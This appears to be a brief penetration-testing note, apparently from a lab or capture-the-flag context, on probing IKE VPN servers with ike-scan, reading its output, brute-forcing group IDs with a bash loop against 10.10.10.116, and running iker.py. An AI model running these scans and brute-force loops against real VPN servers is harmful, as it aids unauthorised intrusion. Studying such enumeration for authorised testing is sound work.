IKE is used on VPN servers on UDP 500. Test a server with
ike-scan -M $target
Example output:
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080) Ending ike-scan 1.9.4: 1 hosts scanned in 0.039 seconds (25.32 hosts/sec). 1 returned handshake; 0 returned notify
- PSK means that a preshared key is used.
- 1 returned handshake, 0, returned notify means that the VPN server is open for renegotiation and some transformations starting with VID should have been returned as well.
Brute force an ID. Use the following bash line with the file from Hacktricks:
while read line; do (echo "Found ID: $line" && ike-scan -M -A -n $line 10.10.10.116) | grep -B14 "1 returned handshake" | grep "Found ID:"; done < /tmp/list
If this doesn’t work: Use iker.py: (/tmp/ip => File with target IP.)
python iker.py -i /tmp/ip -o /tmp/iker_output -v
Leave a Reply
You must be logged in to post a comment.